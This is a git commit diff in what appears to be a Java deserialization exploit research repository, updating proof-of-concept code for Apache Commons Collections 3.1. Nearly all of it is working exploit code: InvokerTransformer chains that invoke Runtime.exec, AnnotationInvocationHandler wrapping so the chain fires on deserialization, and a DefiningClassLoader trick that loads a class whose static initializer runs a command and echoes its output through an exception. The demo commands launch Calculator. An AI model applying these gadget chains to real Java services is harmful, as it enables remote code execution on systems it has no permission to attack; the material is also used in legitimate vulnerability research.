fix collections3

Author: xuanyh

src/main/java/com/threedr3am/bug/collections3/no1/SerializeMapForTransformer.java

@@ -30,7 +30,7 @@ public static void main( String[] args ) throws Exception {
                 new ConstantTransformer(Runtime.class),
                 new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
                 new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[0]}),
-                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"touch /_"}),
+                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"/Applications/Calculator.app/Contents/MacOS/Calculator"}),
         };
         Transformer transformer = new ChainedTransformer(transformers);
 
@@ -40,8 +40,6 @@ public static void main( String[] args ) throws Exception {
         //测试TransformerMap在map的key、value改变中触发
 //        testMap(transformer);
 
-        //测试重写readObject方法反序列化
-//        testReadObject();
 
     }
 
@@ -79,24 +77,4 @@ private static void testMap(Transformer transformer) throws Exception{
         innerMap.put("2","orange");
     }
 
-    /**
-     * 测试重写readObject是否可以在反序列化中优先执行
-     *
-     */
-    private static void testReadObject() throws Exception {
-        A a = new A();
-        //序列化
-        byte[] bytes = SerializeUtil.serialize(a);
-        A a1 = SerializeUtil.deserialize(bytes);
-    }
-
-}
-
-/**
- * 测试readObject重写类
- */
-class A implements Serializable{
-    private void readObject(ObjectInputStream var1) {
-        System.out.println("exec readObject");
-    }
 }

src/main/java/com/threedr3am/bug/collections3/no2/CallbackRuntime.java

@@ -3,6 +3,8 @@
 import java.io.BufferedInputStream;
 
 /**
+ * 抛异常回显执行命令
+ *
  * Created by xuanyonghao on 2018/5/5.
  */
 public class CallbackRuntime {

src/main/java/com/threedr3am/bug/collections3/no2/CallbackRuntime2.java

@@ -3,7 +3,7 @@
 import java.io.BufferedInputStream;
 
 /**
- * 利用加载时自动执行
+ * 利用加载时自动执行 & 抛异常回显
  *
  * Created by xuanyonghao on 2018/5/5.
  */
@@ -25,7 +25,7 @@ public static String exec(String cmd) {
     }
     static {
         if (true) {
-            throw new RuntimeException(exec("ipconfig"));
+            throw new RuntimeException(exec("/Applications/Calculator.app/Contents/MacOS/Calculator"));
         }
     }
 }

src/main/java/com/threedr3am/bug/collections3/no2/SerializeMapForTransformer.java

@@ -16,71 +16,86 @@
 
 /**
  * 此处基于Collections3.1中的TransformedMap利用漏洞，并进一步利用defineCLass构造回显,回显利用异常抛出带回，
- * 但由于DefiningClassLoader类所属jar包使用范围有限，而且AnnotationInvocationHandler的利用也仅限jdk1.8以下，
- * 使得这样的利用链可用性不高。
+ * 但由于DefiningClassLoader类所属jar包使用范围有限，而且AnnotationInvocationHandler的利用也仅限jdk1.8以下， 使得这样的利用链可用性不高。
  *
  * Created by xuanyonghao on 2018/5/4.
  */
 public class SerializeMapForTransformer {
-    public static void main(String[] args) throws Throwable {
-//        testCallbackRuntime();
-//        testAnnotationInvocationHandlerForDefineClass();
 
-        //测试加载class时触发远程指令
-        testCallbackRuntime2();
-        //测试反序列化加载class时触发远程指令
-//        testStaticClassInitForDefineClass();
+  public static void main(String[] args) throws Throwable {
+    //测试执行exec方法触发远程指令
+//    testCallbackRuntime();
+    //测试反序列化加载class时执行exec方法触发远程指令
+//    testAnnotationInvocationHandlerForDefineClass();
 
-    }
+    //测试加载class时触发远程指令
+//    testCallbackRuntime2();
+    //测试反序列化加载class时触发远程指令
+    testStaticClassInitForDefineClass();
 
-    private static void testStaticClassInitForDefineClass() throws Exception {
-        Transformer[] transformers = new Transformer[]{
-                new ConstantTransformer(DefiningClassLoader.class),
-                new InvokerTransformer("getConstructor",new Class[]{Class[].class},new Object[]{new Class[0]}),
-                new InvokerTransformer("newInstance",new Class[]{Object[].class},new Object[]{new Object[0]}),
-                new InvokerTransformer("defineClass",new Class[]{String.class,byte[].class},new Object[]{"com.xyh.collections3.no2.CallbackRuntime2", FileToByteArrayUtil.readCallbackRuntimeClassBytes("target/classes/com/xyh/collections3/no2/CallbackRuntime2.class")}),
-                new InvokerTransformer("newInstance",new Class[]{},new Object[]{})
-        };
-        Transformer transformer = new ChainedTransformer(transformers);
-        Map inner = new HashMap();
-        inner.put("value","value");
-        Map ouputMap = TransformedMap.decorate(inner,null,transformer);
-        Constructor<?> ctor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class,Map.class);
-        ctor.setAccessible(true);
-        Object o = ctor.newInstance(Target.class,ouputMap);
-        //序列化输出
-        byte[] bytes = SerializeUtil.serialize(o);
-        //反序列化
-        SerializeUtil.deserialize(bytes);
-    }
+  }
 
-    private static void testAnnotationInvocationHandlerForDefineClass() throws Exception {
-        Transformer[] transformers = new Transformer[]{
-                new ConstantTransformer(DefiningClassLoader.class),
-                new InvokerTransformer("getConstructor",new Class[]{Class[].class},new Object[]{new Class[0]}),
-                new InvokerTransformer("newInstance",new Class[]{Object[].class},new Object[]{new Object[0]}),
-                new InvokerTransformer("defineClass",new Class[]{String.class,byte[].class},new Object[]{"com.xyh.collections3.no2.CallbackRuntime", FileToByteArrayUtil.readCallbackRuntimeClassBytes("target/classes/com/xyh/collections3/no2/CallbackRuntime.classs")}),
-                new InvokerTransformer("newInstance",new Class[]{},new Object[]{}),
-                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"ipconfig"})
-        };
-        Transformer transformer = new ChainedTransformer(transformers);
-        Map inner = new HashMap();
-        inner.put("value","value");
-        Map ouputMap = TransformedMap.decorate(inner,null,transformer);
-        Constructor<?> ctor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class,Map.class);
-        ctor.setAccessible(true);
-        Object o = ctor.newInstance(Target.class,ouputMap);
-        //序列化输出
-        byte[] bytes = SerializeUtil.serialize(o);
-        //反序列化
-        SerializeUtil.deserialize(bytes);
-    }
+  private static void testStaticClassInitForDefineClass() throws Exception {
+    Transformer[] transformers = new Transformer[]{
+        new ConstantTransformer(DefiningClassLoader.class),
+        new InvokerTransformer("getConstructor", new Class[]{Class[].class},
+            new Object[]{new Class[0]}),
+        new InvokerTransformer("newInstance", new Class[]{Object[].class},
+            new Object[]{new Object[0]}),
+        new InvokerTransformer("defineClass", new Class[]{String.class, byte[].class},
+            new Object[]{"com.threedr3am.bug.collections3.no2.CallbackRuntime2",
+                FileToByteArrayUtil.readCallbackRuntimeClassBytes(
+                    "com/threedr3am/bug/collections3/no2/CallbackRuntime2.class")}),
+        new InvokerTransformer("newInstance", new Class[]{}, new Object[]{})
+    };
+    Transformer transformer = new ChainedTransformer(transformers);
+    Map inner = new HashMap();
+    inner.put("value", "value");
+    Map ouputMap = TransformedMap.decorate(inner, null, transformer);
+    Constructor<?> ctor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler")
+        .getDeclaredConstructor(Class.class, Map.class);
+    ctor.setAccessible(true);
+    Object o = ctor.newInstance(Target.class, ouputMap);
+    //序列化输出
+    byte[] bytes = SerializeUtil.serialize(o);
+    //反序列化
+    SerializeUtil.deserialize(bytes);
+  }
 
-    private static void testCallbackRuntime() throws Throwable {
-        new CallbackRuntime().exec("ipconfig");
-    }
+  private static void testAnnotationInvocationHandlerForDefineClass() throws Exception {
+    Transformer[] transformers = new Transformer[]{
+        new ConstantTransformer(DefiningClassLoader.class),
+        new InvokerTransformer("getConstructor", new Class[]{Class[].class},
+            new Object[]{new Class[0]}),
+        new InvokerTransformer("newInstance", new Class[]{Object[].class},
+            new Object[]{new Object[0]}),
+        new InvokerTransformer("defineClass", new Class[]{String.class, byte[].class},
+            new Object[]{"com.threedr3am.bug.collections3.no2.CallbackRuntime",
+                FileToByteArrayUtil.readCallbackRuntimeClassBytes(
+                    "com/threedr3am/bug/collections3/no2/CallbackRuntime.class")}),
+        new InvokerTransformer("newInstance", new Class[]{}, new Object[]{}),
+        new InvokerTransformer("exec", new Class[]{String.class},
+            new Object[]{"/Applications/Calculator.app/Contents/MacOS/Calculator"})
+    };
+    Transformer transformer = new ChainedTransformer(transformers);
+    Map inner = new HashMap();
+    inner.put("value", "value");
+    Map ouputMap = TransformedMap.decorate(inner, null, transformer);
+    Constructor<?> ctor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler")
+        .getDeclaredConstructor(Class.class, Map.class);
+    ctor.setAccessible(true);
+    Object o = ctor.newInstance(Target.class, ouputMap);
+    //序列化输出
+    byte[] bytes = SerializeUtil.serialize(o);
+    //反序列化
+    SerializeUtil.deserialize(bytes);
+  }
 
-    private static void testCallbackRuntime2() throws Throwable {
-        new CallbackRuntime2();
-    }
+  private static void testCallbackRuntime() throws Throwable {
+    new CallbackRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
+  }
+
+  private static void testCallbackRuntime2() throws Throwable {
+    new CallbackRuntime2();
+  }
 }

src/main/java/com/threedr3am/bug/utils/FileToByteArrayUtil.java

@@ -1,8 +1,7 @@
 package com.threedr3am.bug.utils;
 
-import java.io.File;
-import java.io.FileInputStream;
 import java.io.IOException;
+import java.io.InputStream;
 
 /**
  * Created by xuanyonghao on 2018/5/5.
@@ -16,9 +15,9 @@ public class FileToByteArrayUtil {
      */
     public static byte[] readCallbackRuntimeClassBytes(String classPath) throws IOException {
         //执行前先编译CallbackRuntime类得到class文件
-        FileInputStream fileInputStream = new FileInputStream(new File(classPath));
-        byte[] bytes = new byte[fileInputStream.available()];
-        fileInputStream.read(bytes);
+        InputStream inputStream = Thread.currentThread().getContextClassLoader().getResourceAsStream(classPath);
+        byte[] bytes = new byte[inputStream.available()];
+        inputStream.read(bytes);
         return bytes;
     }
 }